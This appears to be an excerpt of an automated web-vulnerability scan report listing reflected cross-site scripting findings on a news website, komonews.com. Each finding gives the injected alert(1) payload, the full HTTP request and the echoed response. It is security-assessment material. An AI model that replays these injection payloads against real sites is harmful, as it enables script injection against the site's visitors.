X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53541


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Roommates'
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708664.html?d1809"><script>alert(1)</script>2d2f9577483=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.467. http://www.komonews.com/news/offbeat/116708664.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116708664.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109db"><script>alert(1)</script>99deb6313cc was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708664.html?ref=guiltypleasures109db"><script>alert(1)</script>99deb6313cc HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Roommates'
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708664.html?ref=guiltypleasures109db"><script>alert(1)</script>99deb6313cc" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.468. http://www.komonews.com/news/offbeat/116708719.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116708719.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82447"><script>alert(1)</script>4ea4956d695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53661


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Big cleani
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?82447"><script>alert(1)</script>4ea4956d695=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.469. http://www.komonews.com/news/offbeat/116708719.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116708719.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4ec"><script>alert(1)</script>245db4cf499 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Big cleani
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116708719.html?ref=guiltypleasures2e4ec"><script>alert(1)</script>245db4cf499" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.470. http://www.komonews.com/news/offbeat/116749349.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116749349.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36b8"><script>alert(1)</script>3f9817aad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Brazil fir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?d36b8"><script>alert(1)</script>3f9817aad3=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.471. http://www.komonews.com/news/offbeat/116749349.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/offbeat/116749349.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a7f6"><script>alert(1)</script>b8ce1649d07 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Brazil fir
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.472. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116596303.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabb5"><script>alert(1)</script>859f10f2154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116596303.html?cabb5"><script>alert(1)</script>859f10f2154=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Virtual pr
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116596303.html?cabb5"><script>alert(1)</script>859f10f2154=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.473. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116609493.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23646"><script>alert(1)</script>23fe8e6f7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56187


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   NASA to la
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.474. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116666119.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d81"><script>alert(1)</script>9bc466a742f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56275


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Amazon off
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.475. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116674969.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb191"><script>alert(1)</script>87907b0c0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   New EU ant
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.476. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116740874.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ee4"><script>alert(1)</script>f02e797a14e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   'Gears of
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.477. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/tech/116748424.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b6"><script>alert(1)</script>aef4ec57354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Apple to u
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.478. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /obits

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4713"%3balert(1)//0545c331dec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4713";alert(1)//0545c331dec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /obits?b4713"%3balert(1)//0545c331dec=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:17:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:17:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 139592

...[SNIP]...
<script type="text/javascript">
   var current_full_uri = "/obits?&b4713";alert(1)//0545c331dec=1";
   </script>
...[SNIP]...

1.479. http://www.komonews.com/obits/ [chid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /obits/

Issue detail

The value of the chid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44e"><script>alert(1)</script>c12346d1bee was submitted in the chid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obits/?chid=directoryae44e"><script>alert(1)</script>c12346d1bee HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:15:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 47749

...[SNIP]...
<a href="?chid=directoryae44e"><script>alert(1)</script>c12346d1bee&pg=2" rel="next">
...[SNIP]...

1.480. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /obits/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d9d3"%3balert(1)//07f466772f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d9d3";alert(1)//07f466772f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /obits/?5d9d3"%3balert(1)//07f466772f8=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Expires: Wed, 23 Feb 2011 22:18:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 23 Feb 2011 22:18:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 139593

...[SNIP]...
<script type="text/javascript">
   var current_full_uri = "/obits/?&5d9d3";alert(1)//07f466772f8=1";
   </script>
...[SNIP]...

1.481. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /opinion/kenschram/116741919.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca69c"><script>alert(1)</script>9fc7fa49d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

